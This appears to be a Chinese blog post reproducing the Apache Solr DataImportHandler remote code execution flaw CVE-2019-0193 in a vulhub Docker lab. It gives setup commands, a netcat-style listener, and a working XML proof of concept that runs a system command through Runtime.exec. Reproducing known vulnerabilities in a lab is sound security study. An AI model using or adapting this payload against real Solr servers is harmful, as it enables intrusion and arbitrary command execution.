Apache Solr rce復現(CVE-2019-0193)

Apache Solr rce復現(CVE-2019-0193)

前言

影響版本
Apache Solr < 8.2.0

環境搭建

啓動docker

systemctl start docker

獲取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

進入對應目錄

cd vulhub/solr/CVE-2019-0193/

啓動容器

docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db # 創建名爲“test”的Core,並開啓dataimport

查看容器

docker ps

在這裏插入圖片描述

漏洞復現

centos啓動監聽

nv -lvvp 80

訪問

http://192.168.164.162:8983/solr/#/

在這裏插入圖片描述
在這裏插入圖片描述
打開剛剛創建好的test核心,選擇Dataimport功能並選擇debug模式,填入以下POC

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

點擊Execute with this Confuguration
查看生成文件

docker exec -it 939 /bin/bash
ls /tmp

在這裏插入圖片描述

參考文章

https://vulhub.org/#/environments/solr/CVE-2019-0193/
https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章